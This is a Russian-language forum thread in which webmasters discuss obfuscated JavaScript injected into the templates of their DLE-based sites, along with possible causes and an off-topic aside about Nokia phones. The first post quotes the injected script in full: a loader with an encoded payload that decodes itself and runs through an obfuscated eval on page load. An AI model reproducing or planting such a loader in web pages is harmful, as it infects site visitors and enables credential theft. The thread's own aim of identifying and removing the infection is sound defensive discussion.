inokentik 45 Опубликовано: 1 апреля 2010 Рассказать Опубликовано: 1 апреля 2010 Что за ерунда? Новые дырки или хостеры? Есть 3 сайта и в всех трех обнаружил код следующего содержания <script language='javascript' type='text/javascript'>var pingTar;pingTar='%54%56%5b%56%53%55%57%52%21%56%59%65%5c%6a%4b%42%6c%77%78%16%17%4b%5b%40%4e%62%48%16%4b%54%63%7c%0b%06%2e%22%5a%42%47%59%78%75%49%48%65%41%1b%41%57%5b%51%5b%7f%79%47%5c%28%47%52%08%57%77%75%4a%56%1f%5e%6d%50%55%41%54%55%57%1f%1e%62%4a%50%46%4e%4a%52%58%1e%18%5d%5a%75%49%17%50%4d%53%35%41%51%61%0f%48%56%11%56%5e%5d%42%6e%55%45%1f%4e%56%5d%57%17%46%53%62%65%4f%6f%5a%4e%2d%24%0b%32%1f%55%59%59%67%14%77%47%5d%56%66%70%13%0d%3f%20%0b%18%4c%45%0a%42%78%54%6b%75%54%5e%64%4a%7b%04%50%40%53%59%41%4a%48%75%0a%50%6f%4b%56%03%03%57%5a%5d%4e%53%1c%4f%6e%58%56%13%46%01%6f%45%48%14%7c%50%44%71%12%2a%1d%51%1a%4b%71%54%6d%17%6c%50%0a%7b%40%56%10%67%46%64%5f%1d%1d%16%73%45%4d%65%51%51%69%12%25%0a%1e%2c%31%3d%08%02%38%1a%3b%34%69%49%5b%0f%49%5b%48%4b%1a%57%58%57%53%45%6d%2c%5a%18%59%56%3d%38%18%10%1b%58%43%43%60%66%43%17%43%50%5b%4f%51%0e%24%13%03%4a%54%4e%4c%43%74%47%1d%1e%56%18%59%77%73%4e%72%6c%5b%5d%0a%49%55%0e%3e%1d%18%50%1b%42%5a%45%59%4e%77%57%40%6a%19%0e%1d%5d%64%7b%57%1f%13%52%48%2f%0e%6d%1f%0b%59%42%53%59%14%38%63%44%54%4a%1e%13%14%33%01%67%52%56%49%69%09%4e%50%5a%6a%18%4d%1a%3c%09%58%55%54%66%4d%56%6e%5a%0c%32%04%4d%3f%48%1d%01%51%11%68%5a%1d%3c%43%57%02%4e%51%53%4a%54%7c%3e%1a%44%70%5b%57%15%5f%74%5a%53%15%59%71%57%5a%50%69%68%43%12%4f%54%0e%0b%68%6f%46%01%61%4c%45%53%4e%40%24%76%56%6b%51%3d%43%15%4b%7b%54%3f%5c%0a%5f%4b%5f%56%79%7e%5d%33%41%55%0b%4e%47%68%07%2b%0d%03%1c%1a%5e%56%66%52%4a%5d%7d%10%41%4a%04%23%01%67%4b%56%54%0b%46%4e%65%74%6d%4f%14%17%19%10%15%6d%48%4d%56%33%50%5e%40%67%6c%48%06%18%1a%77%56%42%52%42%50%06%57%52%7d%58%0b%07%67%55%6d%54%63%0a%55%11%1c%2f%23%5b%57%65%4a%5a%0e%2e%7f%45%4a%7d%59%50%5a%45%45%59%45%14%12%1a%07%2e%55%65%47%50%45%51%1e%1e%57%61%63%1f%10%0b%1e%48%53%69%49%23%5a%56%58%7e%75%5d%58%6b%4f%5e%4e%1d%32%09%47%72%7e%6a%54%0e%36%01%1d%0a%0f%68%42%63%4f%55%54%0e%36%01%61%43%65%5e%0b%48%71%5a%59%66%14%19%7c%4b%79%45%17%44%7e%52%6e%51%11%41%1a%64%54%7f%3c%0f%5b%50%5d%58%1d%62%7a%49%4c%50%19%1c%2a%53%05%7f%30%49%73%7c%74%6b%5c%43%16%45%09%7a%05%7f%08%1d%71%62%16%3d%45%56%4e%5c%58%45%74%74%66%23%0e%7a%57%53%16%78%7c%4a%5b%72%49%55%27%13%36%4f%51%42%51%76%7d%45%64%68%7f%24%63%1c%70%48%5e%10%6b%1f%50%59%4b%5c%4d%4a%01%1e%16%56%09%42%5c%5d%57%6b%47%4b%7b%48%62%0d%5a%18%53%38%41%5f%50%1f%50%54%5d%47%64%1b%27%14%09%18%18%58%6d%44%5a%44%1b%40%1d%1b%4f%2e%43%70%4f%14%45%44%5b%08%61%1b%58%49%5a%6d%48%74%55%69%41%54%42%77%5f%77%68%5c%3a%15%51%43%61%5e%19%02%13%6d%20%5d%42%06%12%08%05%4b%6d%45%19%45%72%55%67%42%40%65%6f%70%54%0e%41%48%50%42%2d%4e%5c%41%60%55%4b%7f%5c%64%4b%33%5c%5b%5f%57%47%77%62%5d%2e%1d%43%14%53%5f%47%46%58%71%4e%7b%62%5d%0e%04%77%73%4b%51%65%41%4c%32%12%26%7e%13%06%04%02%01%32%06%78%70%51%5c%42%53%5a%53%4f%60%6d%51%13%79%54%42%31%53%66%51%15%02%57%54%69%5b%4c%47%49%68%02%4e%57%51%45%0f%7d%78%56%53%55%55%10%0a%46%4b%19%5d%76%69%4d%47%62%78%7a%0f%03%08%03%51%7f%59%04%04%59%5c%0f%4c%5f%45%12%25%25%0d%0e%50%03%46%5a%2f%5e%67%31%5b%03%0e%42%45%7f%73%03%52%5f%50%06%50%56%46%6f%41%44%04%7b%59%55%11%66%7e%45%43%4b%11%14%0c%44%70%78%15%56%4d%57%6a%7d%50%58%73%59%52%58%38%4d%46%41%4d%5e%48%4c%75%58%45%3a%0b%07%21%78%5f%73%17%6f%4e%41%74%76%5e%4e%6f%76%0b%60%77%64%65%6b%43%5b%46%4d%6e%59%43%63%20%5c%42%43%7b%55%29%50%71%08%31%13%49%54%49%12%48%54%47%45%7d%56%09%16%1f%0a';function conMap(pastThe){function bosMaskMax(badLogPong){var fiTabCow=0;var maskMidWil=badLogPong.length, nutNull=0;while(nutNull<maskMidWil){fiTabCow+=beChar(badLogPong,nutNull)*maskMidWil;nutNull++;}return (fiTabCow+'');}function beChar(conGun,catNs){return conGun['cZhZaZrzCSoldSeSAZtZ'.replace(/[ZlzSG]/g, '')](catNs);}if((new String(document.write)).indexOf('arity')>0){return;}var nanoLoop=0,pisAb=0,nsPut=98;var bcMid='';var onRar=(new String(conMap)).replace(/[^@a-z0-9A-Z_.,-]/g,'');var tipBedPip=bosMaskMax(onRar);pastThe=window['u{n@e#s#c@a0pme@'.replace(/[m#@\{0]/g, '')](pastThe);for(var itExit=0; itExit < (pastThe.length); itExit++){var mapMegaMap=beChar(onRar,nanoLoop);var onMapFog=beChar(tipBedPip,pisAb);var conWho=mapMegaMap^onMapFog^nsPut;var cpGun=beChar(pastThe,itExit);nanoLoop++,pisAb++;bcMid+=String['fDr6oDmICIhba6rbC6o9dDe6'.replace(/[bI69D]/g, '')](cpGun^conWho);if(pisAb>tipBedPip.length)pisAb=0;if(nanoLoop>onRar.length)nanoLoop=0;}window['e<v]a]lf'.replace(/[#\.f\]\<]/g, '')](bcMid);return bcMid=new String();}conMap(pingTar);</script> На всех трех сайтах, во всех страницах main.tpl во всех шаблонах! Не особо удивился ы ,еслиб только у меня, но также у знакомого обнаружен данный баг! Везде движки оригиналы! Что за фигня такая? Подумал на хостера, но у нас хостеры разные... У кого то есть еще подобное???? Цитата Ссылка на сообщение Поделиться на других сайтах
llbarmenll 18 Опубликовано: 1 апреля 2010 Рассказать Опубликовано: 1 апреля 2010 На двух сайтах всё чисто У вас стоит чистый двиг? тьфу-тьфу что бы не было опять глобального бага Цитата Ссылка на сообщение Поделиться на других сайтах
inokentik 45 Опубликовано: 1 апреля 2010 Рассказать Опубликовано: 1 апреля 2010 Автор Я же написал, чистыйВчера человеку на tutdesign.ru удаляли! Поменялипаоли на фтп, сегодня опять код появился, что может быть такое?????? Цитата Ссылка на сообщение Поделиться на других сайтах
hotdj 33 Опубликовано: 1 апреля 2010 Рассказать Опубликовано: 1 апреля 2010 Я же написал, чистый Вчера человеку на tutdesign.ru удаляли! Поменялипаоли на фтп, сегодня опять код появился, что может быть такое?????? Может модуль какой установили нехороший ? Цитата Ссылка на сообщение Поделиться на других сайтах
inokentik 45 Опубликовано: 1 апреля 2010 Рассказать Опубликовано: 1 апреля 2010 Автор Лично у меня все только стандартными средствами движка, ничего стороннего и лишнего нет! Можете сайт глянуть в подписи, но тем не менее правка кода была обнаружена и не пойму как это произошло! Цитата Ссылка на сообщение Поделиться на других сайтах
hotdj 33 Опубликовано: 1 апреля 2010 Рассказать Опубликовано: 1 апреля 2010 ========== кстати по своему сайту моб софта. у меня трубка 5600 xpress music,, чё там для неё нарыть мона ?? дай ссылки на категории для неё )) а то симбианы незнаю какие версии )) 9 ?Чтото я несмог нати в исходнике что либо лишее кроме ровного кода ) Цитата Ссылка на сообщение Поделиться на других сайтах
inokentik 45 Опубликовано: 1 апреля 2010 Рассказать Опубликовано: 1 апреля 2010 Автор Такой модели я не слышал и на сайте nokia.ru такой тоже нет... Ежели Вы имели ввиду 5610 xpress music, то это 40 серия и у меня нет раздела для данной трубки, это не симбиан! Вы уточните модель точней! ========== кстати по своему сайту моб софта. у меня трубка 5600 xpress music,, чё там для неё нарыть мона ?? дай ссылки на категории для неё )) а то симбианы незнаю какие версии )) 9 ? Чтото я несмог нати в исходнике что либо лишее кроме ровного кода ) Я ждать не собираюсь пока кто-то отхватит вирусы! Есесвенно код был удален уже!!! Цитата Ссылка на сообщение Поделиться на других сайтах
hotdj 33 Опубликовано: 1 апреля 2010 Рассказать Опубликовано: 1 апреля 2010 Модель уточнил, 5800 ))) ======= а вот сам теперь буду сидеть, вдруг что-то на самом деле, бекап уже сделал )) а какой хостинг ?а где был код ? в начала или конце ?? Цитата Ссылка на сообщение Поделиться на других сайтах
inokentik 45 Опубликовано: 1 апреля 2010 Рассказать Опубликовано: 1 апреля 2010 Автор Nokia 5800 это Symbian 9.4, тебе сюда http://www.mobile-soft.su/symbian-9-4/ А код был сразу после тэга <body> и он довольно большой, из 1-го поста видно! Цитата Ссылка на сообщение Поделиться на других сайтах
hotdj 33 Опубликовано: 1 апреля 2010 Рассказать Опубликовано: 1 апреля 2010 Спасиб. Честно незнаю, пока у меня такого нет, может мой сайт не такой известный чтобы был повод его взламывать )) хотя версия 8.2 когда была ломанули )) Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 072 Опубликовано: 1 апреля 2010 Рассказать Опубликовано: 1 апреля 2010 Что за ерунда? Новые дырки или хостеры? Есть 3 сайта и в всех трех обнаружил код следующего содержания почему новые? Уже ниодин год. Читайте темы: http://forum.dle-news.ru/index.php?s=&showtopic=39386&view=findpost&p=175979 http://forum.dle-news.ru/index.php?showtopic=32928&hl=iframe много полезной информации о причинах и методах предотвращения. Цитата Ссылка на сообщение Поделиться на других сайтах
hotdj 33 Опубликовано: 1 апреля 2010 Рассказать Опубликовано: 1 апреля 2010 Что за ерунда? Новые дырки или хостеры? Есть 3 сайта и в всех трех обнаружил код следующего содержания почему новые? Уже ниодин год. Читайте темы: http://forum.dle-news.ru/index.php?s=&showtopic=39386&view=findpost&p=175979 http://forum.dle-news.ru/index.php?showtopic=32928&hl=iframe много полезной информации о причинах и методах предотвращения. интересно, задумывался только если пароли сохранять в браузере или нет. А вот по поводу остального недумал. Т.е. заходишь на сайт, получаешь скриптовый вирус на комп, а он уже шлёт пассы все, умно сделанно, будем думать что да как! Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.